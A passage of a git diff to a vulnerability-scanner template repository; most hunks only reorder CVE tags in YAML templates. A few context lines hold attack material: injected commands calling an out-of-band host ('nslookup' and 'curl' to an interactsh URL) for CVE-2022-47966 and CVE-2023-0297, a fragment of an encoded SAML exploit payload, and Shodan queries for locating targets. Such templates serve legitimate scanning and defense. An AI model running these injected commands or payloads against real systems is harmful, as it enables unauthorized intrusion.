a/http/cves/2022/CVE-2022-37190.yaml b/http/cves/2022/CVE-2022-37190.yaml index 83aa73fa1b..20ec64c480 100644 --- a/http/cves/2022/CVE-2022-37190.yaml +++ b/http/cves/2022/CVE-2022-37190.yaml @@ -26,7 +26,7 @@ info: max-request: 3 vendor: cuppacms product: cuppacms - tags: cve,cve2022,rce,cuppa,authenticated,cuppacms + tags: cve2022,cve,rce,cuppa,authenticated,cuppacms http: - raw: diff --git a/http/cves/2022/CVE-2022-3768.yaml b/http/cves/2022/CVE-2022-3768.yaml index b8dab50da9..848f14d862 100644 --- a/http/cves/2022/CVE-2022-3768.yaml +++ b/http/cves/2022/CVE-2022-3768.yaml @@ -28,7 +28,7 @@ info: vendor: wpsmartcontracts product: wpsmartcontracts framework: wordpress - tags: wp-smart-contracts,wpscan,cve,wp-plugin,sqli,wordpress,cve2022,wp,authenticated,wpsmartcontracts + tags: cve,cve2022,wp-smart-contracts,wpscan,wp-plugin,sqli,wordpress,wp,authenticated,wpsmartcontracts http: - raw: diff --git a/http/cves/2022/CVE-2022-3800.yaml b/http/cves/2022/CVE-2022-3800.yaml index 3f84cd21c4..7ac7885bae 100644 --- a/http/cves/2022/CVE-2022-3800.yaml +++ b/http/cves/2022/CVE-2022-3800.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: ibax product: go-ibax - tags: cve,cve2022,ibax,go-ibax,sqli + tags: cve2022,cve,ibax,go-ibax,sqli http: - raw: diff --git a/http/cves/2022/CVE-2022-38295.yaml b/http/cves/2022/CVE-2022-38295.yaml index ae4db84d9a..026a852761 100644 --- a/http/cves/2022/CVE-2022-38295.yaml +++ b/http/cves/2022/CVE-2022-38295.yaml @@ -26,7 +26,7 @@ info: max-request: 3 vendor: cuppacms product: cuppacms - tags: cve,cve2022,xss,cuppa,authenticated,cuppacms + tags: cve2022,cve,xss,cuppa,authenticated,cuppacms http: - raw: diff --git a/http/cves/2022/CVE-2022-38467.yaml b/http/cves/2022/CVE-2022-38467.yaml index f8f9cea046..3b1d846c4b 100644 --- a/http/cves/2022/CVE-2022-38467.yaml +++ b/http/cves/2022/CVE-2022-38467.yaml @@ -28,7 +28,7 @@ info: vendor: crmperks product: crm_perks_forms framework: wordpress - tags: crm-perks-forms,wpscan,cve,cve2022,wordpress,wp,wp-plugin,xss,crmperks + tags: cve2022,cve,crm-perks-forms,wpscan,wordpress,wp,wp-plugin,xss,crmperks http: - raw: diff --git a/http/cves/2022/CVE-2022-38553.yaml b/http/cves/2022/CVE-2022-38553.yaml index 372770ab9f..1ed9ee257f 100644 --- a/http/cves/2022/CVE-2022-38553.yaml +++ b/http/cves/2022/CVE-2022-38553.yaml @@ -30,7 +30,7 @@ info: vendor: creativeitem product: academy_learning_management_system google-query: intext:"Study any topic, anytime" - tags: cve,cve2022,academylms,xss,creativeitem + tags: cve2022,cve,academylms,xss,creativeitem http: - method: GET diff --git a/http/cves/2022/CVE-2022-3908.yaml b/http/cves/2022/CVE-2022-3908.yaml index 488eea58d0..a764ef9b09 100644 --- a/http/cves/2022/CVE-2022-3908.yaml +++ b/http/cves/2022/CVE-2022-3908.yaml @@ -27,7 +27,7 @@ info: vendor: helloprint product: helloprint framework: wordpress - tags: xss,wordpress,wp-plugin,helloprint,cve,cve2022,wp,authenticated,wpscan + tags: cve,cve2022,xss,wordpress,wp-plugin,helloprint,wp,authenticated,wpscan http: - raw: diff --git a/http/cves/2022/CVE-2022-3933.yaml b/http/cves/2022/CVE-2022-3933.yaml index 989555ad3f..78695d92fc 100644 --- a/http/cves/2022/CVE-2022-3933.yaml +++ b/http/cves/2022/CVE-2022-3933.yaml @@ -27,7 +27,7 @@ info: vendor: g5theme product: essential_real_estate framework: wordpress - tags: wpscan,cve2022,authenticated,wordpress,wp-plugin,wp,essential-real-estate,cve,xss,g5theme + tags: cve,cve2022,wpscan,authenticated,wordpress,wp-plugin,wp,essential-real-estate,xss,g5theme http: - raw: diff --git a/http/cves/2022/CVE-2022-3934.yaml b/http/cves/2022/CVE-2022-3934.yaml index 4bb79ea4bf..4bd7a738fe 100644 --- a/http/cves/2022/CVE-2022-3934.yaml +++ b/http/cves/2022/CVE-2022-3934.yaml @@ -26,7 +26,7 @@ info: vendor: mehanoid product: flat_pm framework: wordpress - tags: authenticated,wpscan,cve,cve2022,xss,flatpm,wordpress,wp-plugin,mehanoid + tags: cve2022,cve,authenticated,wpscan,xss,flatpm,wordpress,wp-plugin,mehanoid http: - raw: diff --git a/http/cves/2022/CVE-2022-39952.yaml b/http/cves/2022/CVE-2022-39952.yaml index 12603a4627..7d0e6d8a9b 100644 --- a/http/cves/2022/CVE-2022-39952.yaml +++ b/http/cves/2022/CVE-2022-39952.yaml @@ -28,7 +28,7 @@ info: vendor: fortinet product: fortinac shodan-query: title:"FortiNAC" - tags: fortinet,fortinac,cve,cve2022,fileupload,rce,intrusive + tags: cve,cve2022,fortinet,fortinac,fileupload,rce,intrusive variables: boundaryId: "{{hex_encode(rand_text_alphanumeric(16))}}" diff --git a/http/cves/2022/CVE-2022-39986.yaml b/http/cves/2022/CVE-2022-39986.yaml index 51f425e9b2..1e83f836cf 100644 --- a/http/cves/2022/CVE-2022-39986.yaml +++ b/http/cves/2022/CVE-2022-39986.yaml @@ -30,7 +30,7 @@ info: vendor: raspap product: raspap shodan-query: http.favicon.hash:-1465760059 - tags: packetstorm,cve,cve2020,raspap,rce + tags: cve,cve2022,packetstorm,raspap,rce http: - raw: diff --git a/http/cves/2022/CVE-2022-40022.yaml b/http/cves/2022/CVE-2022-40022.yaml index f96446e4c5..97a7cbc403 100644 --- a/http/cves/2022/CVE-2022-40022.yaml +++ b/http/cves/2022/CVE-2022-40022.yaml @@ -30,7 +30,7 @@ info: vendor: microchip product: syncserver_s650_firmware shodan-query: html:"Symmetricom SyncServer" - tags: packetstorm,cve,cve2022,syncserver,rce,unauth,microchip + tags: cve,cve2022,packetstorm,syncserver,rce,unauth,microchip http: - raw: diff --git a/http/cves/2022/CVE-2022-40032.yaml b/http/cves/2022/CVE-2022-40032.yaml index 559a241320..154a58cc81 100644 --- a/http/cves/2022/CVE-2022-40032.yaml +++ b/http/cves/2022/CVE-2022-40032.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: simple_task_managing_system_project product: simple_task_managing_system - tags: packetstorm,cve,cve2022,simple-task,stms,sqli,simple_task_managing_system_project + tags: cve,cve2022,packetstorm,simple-task,stms,sqli,simple_task_managing_system_project http: - raw: diff --git a/http/cves/2022/CVE-2022-4050.yaml b/http/cves/2022/CVE-2022-4050.yaml index 9fa066b1d3..1dca33a26f 100644 --- a/http/cves/2022/CVE-2022-4050.yaml +++ b/http/cves/2022/CVE-2022-4050.yaml @@ -28,7 +28,7 @@ info: vendor: beardev product: joomsport framework: wordpress - tags: wpscan,cve,cve2022,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth,beardev + tags: cve,cve2022,wpscan,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth,beardev http: - raw: diff --git a/http/cves/2022/CVE-2022-4057.yaml b/http/cves/2022/CVE-2022-4057.yaml index e1b9879d2d..e70b349510 100644 --- a/http/cves/2022/CVE-2022-4057.yaml +++ b/http/cves/2022/CVE-2022-4057.yaml @@ -29,7 +29,7 @@ info: product: autooptimize framework: wordpress publicwww-query: /wp-content/plugins/autoptimize - tags: wpscan,cve,cve2023,wp,wordpress,wp-plugin,disclosure,autoptimize,optimizingmatters + tags: cve,cve2022,wpscan,wp,wordpress,wp-plugin,disclosure,autoptimize,optimizingmatters http: - method: GET diff --git a/http/cves/2022/CVE-2022-4060.yaml b/http/cves/2022/CVE-2022-4060.yaml index 7ff0a7e98f..2e1b1d29c8 100644 --- a/http/cves/2022/CVE-2022-4060.yaml +++ b/http/cves/2022/CVE-2022-4060.yaml @@ -28,7 +28,7 @@ info: vendor: odude product: user_post_gallery framework: wordpress - tags: unauth,wpscan,cve2022,rce,wordpress,wp-plugin,wp,cve,wp-upg,odude + tags: cve,cve2022,unauth,wpscan,rce,wordpress,wp-plugin,wp,wp-upg,odude http: - method: GET diff --git a/http/cves/2022/CVE-2022-4063.yaml b/http/cves/2022/CVE-2022-4063.yaml index 29205bf34b..da05543e3d 100644 --- a/http/cves/2022/CVE-2022-4063.yaml +++ b/http/cves/2022/CVE-2022-4063.yaml @@ -27,7 +27,7 @@ info: vendor: pluginus product: inpost_gallery framework: wordpress - tags: cve,wp-plugin,wp,inpost-gallery,cve2022,lfi,wordpress,unauth,wpscan,pluginus + tags: cve2022,cve,wp-plugin,wp,inpost-gallery,lfi,wordpress,unauth,wpscan,pluginus http: - method: GET diff --git a/http/cves/2022/CVE-2022-40843.yaml b/http/cves/2022/CVE-2022-40843.yaml index f056628912..0315bbe6cf 100644 --- a/http/cves/2022/CVE-2022-40843.yaml +++ b/http/cves/2022/CVE-2022-40843.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: tenda product: w15e_firmware - tags: cve,cve2022,tenda,auth-bypass,router,iot + tags: cve2022,cve,tenda,auth-bypass,router,iot http: - raw: diff --git a/http/cves/2022/CVE-2022-4140.yaml b/http/cves/2022/CVE-2022-4140.yaml index c596ac628d..4504bd1093 100644 --- a/http/cves/2022/CVE-2022-4140.yaml +++ b/http/cves/2022/CVE-2022-4140.yaml @@ -27,7 +27,7 @@ info: vendor: collne product: welcart_e-commerce framework: wordpress - tags: usc-e-shop,wpscan,cve,cve2022,wp-plugin,wp,wordpress,lfi,unauthenticated,collne + tags: cve,cve2022,usc-e-shop,wpscan,wp-plugin,wp,wordpress,lfi,unauthenticated,collne http: - method: GET diff --git a/http/cves/2022/CVE-2022-41441.yaml b/http/cves/2022/CVE-2022-41441.yaml index 092a28a638..57b2ce56cd 100644 --- a/http/cves/2022/CVE-2022-41441.yaml +++ b/http/cves/2022/CVE-2022-41441.yaml @@ -30,7 +30,7 @@ info: vendor: reqlogic product: reqlogic shodan-query: http.html:"ReQlogic" - tags: packetstorm,cve,cve2022,xss,reqlogic + tags: cve,cve2022,packetstorm,xss,reqlogic http: - method: GET diff --git a/http/cves/2022/CVE-2022-41840.yaml b/http/cves/2022/CVE-2022-41840.yaml index 20c2990a2f..4eebd8f6a4 100644 --- a/http/cves/2022/CVE-2022-41840.yaml +++ b/http/cves/2022/CVE-2022-41840.yaml @@ -29,7 +29,7 @@ info: vendor: collne product: welcart_e-commerce framework: wordpress - tags: cve,cve2022,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop,collne + tags: cve2022,cve,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop,collne http: - method: GET diff --git a/http/cves/2022/CVE-2022-42095.yaml b/http/cves/2022/CVE-2022-42095.yaml index e9ba3aa0d2..5665d1380d 100644 --- a/http/cves/2022/CVE-2022-42095.yaml +++ b/http/cves/2022/CVE-2022-42095.yaml @@ -28,7 +28,7 @@ info: max-request: 5 vendor: backdropcms product: backdrop_cms - tags: cve,cve2022,xss,cms,backdrop,authenticated,backdropcms + tags: cve2022,cve,xss,cms,backdrop,authenticated,backdropcms http: - raw: diff --git a/http/cves/2022/CVE-2022-4260.yaml b/http/cves/2022/CVE-2022-4260.yaml index 9bfac3a914..11d9f3a953 100644 --- a/http/cves/2022/CVE-2022-4260.yaml +++ b/http/cves/2022/CVE-2022-4260.yaml @@ -27,7 +27,7 @@ info: vendor: wp-ban_project product: wp-ban framework: wordpress - tags: cve2022,wp-plugin,xss,wordpress,wpscan,wp,authenticated,cve,wp-ban,wp-ban_project + tags: cve,cve2022,wp-plugin,xss,wordpress,wpscan,wp,authenticated,wp-ban,wp-ban_project http: - raw: diff --git a/http/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml index 45b06f22e4..9dcb4b3bff 100644 --- a/http/cves/2022/CVE-2022-4295.yaml +++ b/http/cves/2022/CVE-2022-4295.yaml @@ -28,7 +28,7 @@ info: product: show_all_comments framework: wordpress publicwww-query: /wp-content/plugins/show-all-comments-in-one-page - tags: wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page,appjetty + tags: cve2022,cve,wpscan,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page,appjetty http: - method: GET diff --git a/http/cves/2022/CVE-2022-4301.yaml b/http/cves/2022/CVE-2022-4301.yaml index 910235349c..73d94ff8cf 100644 --- a/http/cves/2022/CVE-2022-4301.yaml +++ b/http/cves/2022/CVE-2022-4301.yaml @@ -26,7 +26,7 @@ info: vendor: sunshinephotocart product: sunshine_photo_cart framework: wordpress - tags: cve,cve2022,xss,sunshine,wordpress,wp-plugin,wpscan,unauth,sunshinephotocart + tags: cve2022,cve,xss,sunshine,wordpress,wp-plugin,wpscan,unauth,sunshinephotocart http: - method: GET diff --git a/http/cves/2022/CVE-2022-43014.yaml b/http/cves/2022/CVE-2022-43014.yaml index 162ab2f9b0..74b02894bf 100644 --- a/http/cves/2022/CVE-2022-43014.yaml +++ b/http/cves/2022/CVE-2022-43014.yaml @@ -27,7 +27,7 @@ info: vendor: opencats product: opencats shodan-query: title:"OpenCATS" - tags: cve,cve2022,xss,opencats,authenticated + tags: cve2022,cve,xss,opencats,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-43016.yaml b/http/cves/2022/CVE-2022-43016.yaml index 0fcbe81faf..edb4db0a6f 100644 --- a/http/cves/2022/CVE-2022-43016.yaml +++ b/http/cves/2022/CVE-2022-43016.yaml @@ -27,7 +27,7 @@ info: vendor: opencats product: opencats shodan-query: title:"OpenCATS" - tags: cve,cve2022,xss,opencats,authenticated + tags: cve2022,cve,xss,opencats,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-43140.yaml b/http/cves/2022/CVE-2022-43140.yaml index 0df0bdf39f..6e8acad786 100644 --- a/http/cves/2022/CVE-2022-43140.yaml +++ b/http/cves/2022/CVE-2022-43140.yaml @@ -28,7 +28,7 @@ info: product: kkfileview shodan-query: http.html:"kkFileView" fofa-query: app="kkFileView" - tags: cve,cve2022,ssrf,kkFileview,keking + tags: cve2022,cve,ssrf,kkFileview,keking http: - method: GET diff --git a/http/cves/2022/CVE-2022-4320.yaml b/http/cves/2022/CVE-2022-4320.yaml index 2c29ee8b27..a3d2d20fe5 100644 --- a/http/cves/2022/CVE-2022-4320.yaml +++ b/http/cves/2022/CVE-2022-4320.yaml @@ -26,7 +26,7 @@ info: vendor: mhsoftware product: wordpress_events_calendar_plugin framework: wordpress - tags: calendar,event,xss,wordpress,wp,wp-plugin,cve,cve2022,wpscan,mhsoftware + tags: cve,cve2022,calendar,event,xss,wordpress,wp,wp-plugin,wpscan,mhsoftware http: - method: GET diff --git a/http/cves/2022/CVE-2022-4325.yaml b/http/cves/2022/CVE-2022-4325.yaml index f88c6359e9..02f0dfc42b 100644 --- a/http/cves/2022/CVE-2022-4325.yaml +++ b/http/cves/2022/CVE-2022-4325.yaml @@ -27,7 +27,7 @@ info: vendor: ifeelweb product: post_status_notifier_lite framework: wordpress - tags: wp,wordpress,wpscan,authenticated,cve,cve2022,xss,wp-plugin,post-status-notifier-lite,ifeelweb + tags: cve,cve2022,wp,wordpress,wpscan,authenticated,xss,wp-plugin,post-status-notifier-lite,ifeelweb http: - raw: diff --git a/http/cves/2022/CVE-2022-4328.yaml b/http/cves/2022/CVE-2022-4328.yaml index 348ad4aab5..701dcc929f 100644 --- a/http/cves/2022/CVE-2022-4328.yaml +++ b/http/cves/2022/CVE-2022-4328.yaml @@ -25,7 +25,7 @@ info: vendor: najeebmedia product: woocommerce_checkout_field_manager framework: wordpress - tags: wp,n-media-woocommerce-checkout-fields,wpscan,cve,cve2022,rce,wordpress,wp-plugin,intrusive,najeebmedia + tags: cve2022,cve,wp,n-media-woocommerce-checkout-fields,wpscan,rce,wordpress,wp-plugin,intrusive,najeebmedia http: - raw: diff --git a/http/cves/2022/CVE-2022-43769.yaml b/http/cves/2022/CVE-2022-43769.yaml index d131bc2e8c..c5dfb0c2e7 100644 --- a/http/cves/2022/CVE-2022-43769.yaml +++ b/http/cves/2022/CVE-2022-43769.yaml @@ -27,7 +27,7 @@ info: vendor: hitachi product: vantara_pentaho_business_analytics_server shodan-query: http.favicon.hash:1749354953 - tags: packetstorm,cve,cve2022,rce,ssti,pentaho,kev,hitachi + tags: cve,cve2022,packetstorm,rce,ssti,pentaho,kev,hitachi http: - method: GET diff --git a/http/cves/2022/CVE-2022-4447.yaml b/http/cves/2022/CVE-2022-4447.yaml index 92768c42fa..064644ff2e 100644 --- a/http/cves/2022/CVE-2022-4447.yaml +++ b/http/cves/2022/CVE-2022-4447.yaml @@ -28,7 +28,7 @@ info: vendor: fontsy_project product: fontsy framework: wordpress - tags: cve,wordpress,wp,wpscan,cve2022,wp-plugin,sqli,fontsy,unauth,fontsy_project + tags: cve,cve2022,wordpress,wp,wpscan,wp-plugin,sqli,fontsy,unauth,fontsy_project variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-44877.yaml b/http/cves/2022/CVE-2022-44877.yaml index 1ea4d7fc78..d3c52e1cf6 100644 --- a/http/cves/2022/CVE-2022-44877.yaml +++ b/http/cves/2022/CVE-2022-44877.yaml @@ -30,7 +30,7 @@ info: vendor: control-webpanel product: webpanel shodan-query: http.title:"Login | Control WebPanel" - tags: packetstorm,cve,cve2022,centos,rce,kev,control-webpanel + tags: cve,cve2022,packetstorm,centos,rce,kev,control-webpanel http: - raw: diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml index d053e1a159..c9585e6005 100644 --- a/http/cves/2022/CVE-2022-44944.yaml +++ b/http/cves/2022/CVE-2022-44944.yaml @@ -29,7 +29,7 @@ info: vendor: rukovoditel product: rukovoditel shodan-query: http.favicon.hash:-1499940355 - tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + tags: cve2022,cve,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml index 3805a9edd6..5fca2d7237 100644 --- a/http/cves/2022/CVE-2022-44947.yaml +++ b/http/cves/2022/CVE-2022-44947.yaml @@ -29,7 +29,7 @@ info: vendor: rukovoditel product: rukovoditel shodan-query: http.favicon.hash:-1499940355 - tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + tags: cve2022,cve,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-45038.yaml b/http/cves/2022/CVE-2022-45038.yaml index ab189775cd..b636300871 100644 --- a/http/cves/2022/CVE-2022-45038.yaml +++ b/http/cves/2022/CVE-2022-45038.yaml @@ -27,7 +27,7 @@ info: max-request: 5 vendor: wbce product: wbce_cms - tags: cve,cve2022,xss,wbce,cms,authenticated + tags: cve2022,cve,xss,wbce,cms,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-45354.yaml b/http/cves/2022/CVE-2022-45354.yaml index a2ea276e6e..cdfba01e88 100644 --- a/http/cves/2022/CVE-2022-45354.yaml +++ b/http/cves/2022/CVE-2022-45354.yaml @@ -17,7 +17,7 @@ info: verified: true max-request: 1 shodan-query: html:"/wp-content/plugins/download-monitor/" - tags: cve,cve2023,wordpress,wp-plugin,download-monitor,wp + tags: cve,cve2022,wordpress,wp-plugin,download-monitor,wp http: - method: GET diff --git a/http/cves/2022/CVE-2022-45365.yaml b/http/cves/2022/CVE-2022-45365.yaml index e86824f695..088211ea50 100644 --- a/http/cves/2022/CVE-2022-45365.yaml +++ b/http/cves/2022/CVE-2022-45365.yaml @@ -21,7 +21,7 @@ info: verified: "true" max-request: 1 publicwww-query: "/wp-content/plugins/stock-ticker/" - tags: cve,cve2022,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss + tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss http: - raw: diff --git a/http/cves/2022/CVE-2022-45917.yaml b/http/cves/2022/CVE-2022-45917.yaml index 61f14b9e91..f6fb722e3e 100644 --- a/http/cves/2022/CVE-2022-45917.yaml +++ b/http/cves/2022/CVE-2022-45917.yaml @@ -30,7 +30,7 @@ info: vendor: ilias product: ilias shodan-query: http.html:"ILIAS" - tags: redirect,packetstorm,seclists,cve,cve2022,ilias + tags: cve,cve2022,redirect,packetstorm,seclists,ilias,xss http: - method: GET diff --git a/http/cves/2022/CVE-2022-46073.yaml b/http/cves/2022/CVE-2022-46073.yaml index a3250b1e22..cc3dd341eb 100644 --- a/http/cves/2022/CVE-2022-46073.yaml +++ b/http/cves/2022/CVE-2022-46073.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: helmet_store_showroom_project product: helmet_store_showroom - tags: cve,cve2022,xss,helmet-store-showroom,helmet_store_showroom_project + tags: cve2022,cve,xss,helmet-store-showroom,helmet_store_showroom_project http: - method: GET diff --git a/http/cves/2022/CVE-2022-46934.yaml b/http/cves/2022/CVE-2022-46934.yaml index f3ad1842b8..23782b6988 100644 --- a/http/cves/2022/CVE-2022-46934.yaml +++ b/http/cves/2022/CVE-2022-46934.yaml @@ -27,7 +27,7 @@ info: vendor: keking product: kkfileview shodan-query: http.html:"kkFileView" - tags: xss,cve,cve2022,kkfileview,keking + tags: cve,cve2022,xss,kkfileview,keking http: - method: GET diff --git a/http/cves/2022/CVE-2022-47075.yaml b/http/cves/2022/CVE-2022-47075.yaml index fef0725cb1..aaae75b63a 100644 --- a/http/cves/2022/CVE-2022-47075.yaml +++ b/http/cves/2022/CVE-2022-47075.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: smartofficepayroll product: smartoffice - tags: packetstorm,cve,cve2022,smart-office,info,exposure,smartofficepayroll + tags: cve,cve2022,packetstorm,smart-office,info,exposure,smartofficepayroll http: - method: GET diff --git a/http/cves/2022/CVE-2022-47966.yaml b/http/cves/2022/CVE-2022-47966.yaml index ac5361b481..d26d663987 100644 --- a/http/cves/2022/CVE-2022-47966.yaml +++ b/http/cves/2022/CVE-2022-47966.yaml @@ -29,7 +29,7 @@ info: vendor: zohocorp product: manageengine_access_manager_plus shodan-query: title:"ManageEngine" - tags: packetstorm,cve,cve2022,rce,zoho,manageengine,oast,kev,zohocorp + tags: cve,cve2022,packetstorm,rce,zoho,manageengine,oast,kev,zohocorp variables: cmd: 'nslookup {{interactsh-url}}' SAMLResponse: a H7gKuO6t9MbCJZujA9S7WlLFgdqMuNe0145KRwKl000= RbBWB6AIP8AN1wTZN6YYCKdnClFoh8GqmU2RXoyjmkr6I0AP371IS7jxSMS2zxFCdZ80kInvgVuaEt3yQmcq33/d6yGeOxZU7kF1f1D/da+oKmEoj4s6PQcvaRFNp+RfOxMECBWVTAxzQiH/OUmoL7kyZUhUwP9G8Yk0tksoV9pSEXUozSq+I5KEN4ehXVjqnIj04mF6Zx6cjPm4hciNMw1UAfANhfq7VC5zj6VaQfz7LrY4GlHoALMMqebNYkEkf2N1kDKiAEKVePSo1vHO0AF++alQRJO47c8kgzld1xy5ECvDc7uYwuDJo3KYk5hQ8NSwvana7KdlJeD62GzPlw== diff --git a/http/cves/2022/CVE-2022-48165.yaml b/http/cves/2022/CVE-2022-48165.yaml index 424b32df15..08dc50d5b9 100644 --- a/http/cves/2022/CVE-2022-48165.yaml +++ b/http/cves/2022/CVE-2022-48165.yaml @@ -30,7 +30,7 @@ info: vendor: wavlink product: wl-wn530h4_firmware shodan-query: http.favicon.hash:-1350437236 - tags: cve,cve2022,wavlink,router,exposure + tags: cve2022,cve,wavlink,router,exposure http: - method: GET diff --git a/http/cves/2022/CVE-2022-48197.yaml b/http/cves/2022/CVE-2022-48197.yaml index c54b2c8245..9eeb94df6a 100644 --- a/http/cves/2022/CVE-2022-48197.yaml +++ b/http/cves/2022/CVE-2022-48197.yaml @@ -27,7 +27,7 @@ info: vendor: yui_project product: yui shodan-query: html:"bower_components/yui2/" - tags: packetstorm,yui2,cve,cve2022,xss,yahoo,treeview,yui_project + tags: cve,cve2022,packetstorm,yui2,xss,yahoo,treeview,yui_project http: - method: GET diff --git a/http/cves/2023/CVE-2023-0099.yaml b/http/cves/2023/CVE-2023-0099.yaml index 9d9fbead8e..0568682a7e 100644 --- a/http/cves/2023/CVE-2023-0099.yaml +++ b/http/cves/2023/CVE-2023-0099.yaml @@ -27,7 +27,7 @@ info: vendor: getlasso product: simple_urls framework: wordpress - tags: xss,simple-urls,authenticated,wpscan,wordpress,wp,wp-plugin,cve,cve2023,getlasso + tags: cve,cve2023,xss,simple-urls,authenticated,wpscan,wordpress,wp,wp-plugin,getlasso http: - raw: diff --git a/http/cves/2023/CVE-2023-0126.yaml b/http/cves/2023/CVE-2023-0126.yaml index 9f0deb6cbf..1a940ead34 100644 --- a/http/cves/2023/CVE-2023-0126.yaml +++ b/http/cves/2023/CVE-2023-0126.yaml @@ -28,7 +28,7 @@ info: vendor: sonicwall product: sma1000_firmware shodan-query: title:"Appliance Management Console Login" - tags: cve,cve2023,sonicwall,lfi,sma1000 + tags: cve2023,cve,sonicwall,lfi,sma1000 http: - method: GET diff --git a/http/cves/2023/CVE-2023-0236.yaml b/http/cves/2023/CVE-2023-0236.yaml index 63e29101b0..7f59e9308d 100644 --- a/http/cves/2023/CVE-2023-0236.yaml +++ b/http/cves/2023/CVE-2023-0236.yaml @@ -26,7 +26,7 @@ info: vendor: themeum product: tutor_lms framework: wordpress - tags: cve,cve2022,xss,tutorlms,wpscan,wordpress,wp-plugin,authenticated,themeum + tags: cve2023,cve,xss,tutorlms,wpscan,wordpress,wp-plugin,authenticated,themeum http: - raw: diff --git a/http/cves/2023/CVE-2023-0261.yaml b/http/cves/2023/CVE-2023-0261.yaml index 4611c77829..98c8a0d83c 100644 --- a/http/cves/2023/CVE-2023-0261.yaml +++ b/http/cves/2023/CVE-2023-0261.yaml @@ -27,7 +27,7 @@ info: vendor: ljapps product: wp_tripadvisor_review_slider framework: wordpress - tags: cve2023,wordpress,wp,wp-tripadvisor-review-slider,auth,cve,sqli,wp-plugin,wpscan,ljapps + tags: cve2023,cve,wordpress,wp,wp-tripadvisor-review-slider,auth,sqli,wp-plugin,wpscan,ljapps http: - raw: diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml index b26347c6a0..61f7268cf2 100644 --- a/http/cves/2023/CVE-2023-0297.yaml +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -31,7 +31,7 @@ info: product: pyload shodan-query: html:"pyload" zoomeye-query: app:"pyLoad" - tags: huntr,packetstorm,cve,cve2023,rce,pyload,oast + tags: cve,cve2023,huntr,packetstorm,rce,pyload,oast variables: cmd: "curl {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-0334.yaml b/http/cves/2023/CVE-2023-0334.yaml index a7e7b5c939..4981ab5b4b 100644 --- a/http/cves/2023/CVE-2023-0334.yaml +++ b/http/cves/2023/CVE-2023-0334.yaml @@ -25,7 +25,7 @@ info: product: shortpixel_adaptive_images framework: wordpress publicwww-query: /wp-content/plugins/shortpixel-adaptive-images/ - tags: cve,cve2023,xss,wpscan,wordpress,wp-plugin,wp,shortpixel-adaptive-images,shortpixel + tags: cve2023,cve,xss,wpscan,wordpress,wp-plugin,wp,shortpixel-adaptive-images,shortpixel http: - method: GET diff --git a/http/cves/2023/CVE-2023-0514.yaml b/http/cves/2023/CVE-2023-0514.yaml index 899ce98679..995c1f11b2 100644 --- a/http/cves/2023/CVE-2023-0514.yaml +++ b/http/cves/2023/CVE-2023-0514.yaml @@ -28,7 +28,7 @@ info: vendor: membership_database_project product: membership_database framework: wordpress - tags: wpscan,cve,cve2023,membership-database,wp,wp-plugin,wordpress,authenticated,xss,membership_database_project + tags: cve2023,cve,wpscan,membership-database,wp,wp-plugin,wordpress,authenticated,xss,membership_database_project http: - raw: diff --git a/http/cves/2023/CVE-2023-0527.yaml b/http/cves/2023/CVE-2023-0527.yaml index 33ee85f27d..acf3c1a5b7 100644 --- a/http/cves/2023/CVE-2023-0527.yaml +++ b/http/cves/2023/CVE-2023-0527.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: online_security_guards_hiring_system_project product: online_security_guards_hiring_system - tags: packetstorm,cve,cve2023,osghs,xss,online_security_guards_hiring_system_project + tags: cve2023,cve,packetstorm,osghs,xss,online_security_guards_hiring_system_project http: - raw: diff --git a/http/cves/2023/CVE-2023-0552.yaml b/http/cves/2023/CVE-2023-0552.yaml index b008b84c4e..0f9fe54d93 100644 --- a/http/cves/2023/CVE-2023-0552.yaml +++ b/http/cves/2023/CVE-2023-0552.yaml @@ -25,7 +25,7 @@ info: vendor: genetechsolutions product: pie_register framework: wordpress - tags: cve2023,redirect,pie,pie-register,wpscan,cve,genetechsolutions,wordpress + tags: cve2023,cve,redirect,pie,pie-register,wpscan,genetechsolutions,wordpress http: - method: GET diff --git a/http/cves/2023/CVE-2023-0563.yaml b/http/cves/2023/CVE-2023-0563.yaml index 7abf19d7ee..0129dae91e 100644 --- a/http/cves/2023/CVE-2023-0563.yaml +++ b/http/cves/2023/CVE-2023-0563.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: phpgurukul product: bank_locker_management_system - tags: cve,cve2023,blms,xss,phpgurukul + tags: cve2023,cve,blms,xss,phpgurukul http: - raw: diff --git a/http/cves/2023/CVE-2023-0600.yaml b/http/cves/2023/CVE-2023-0600.yaml index e1084342e1..b9448d0137 100644 --- a/http/cves/2023/CVE-2023-0600.yaml +++ b/http/cves/2023/CVE-2023-0600.yaml @@ -26,7 +26,7 @@ info: framework: wordpress fofa-query: body="wp-stats-manager" public-www: "/wp-content/plugins/wp-stats-manager/" - tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli,plugins-market + tags: 